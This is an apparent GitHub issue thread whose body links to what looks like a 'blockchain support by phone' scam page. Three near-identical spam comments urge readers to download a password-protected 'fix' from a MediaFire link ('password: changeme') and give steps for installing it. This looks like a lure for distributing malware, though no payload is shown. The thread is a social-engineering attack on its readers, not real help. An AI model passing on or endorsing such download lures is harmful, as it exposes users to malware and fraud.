### ISSUE TITLE
https://www.makuu.org/forum/questions-answers/how-do-i-contact-blockchain-support-by-phone-contact-blockchain-support-by-phone

### ISSUE THREAD

**Issue by Eliza253** [merill/aka#2358]
### Aka.ms link name

https://www.makuu.org/forum/questions-answers/how-do-i-contact-blockchain-support-by-phone-contact-blockchain-support-by-phone

### Category (Optional. Select None to auto-select)

None

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
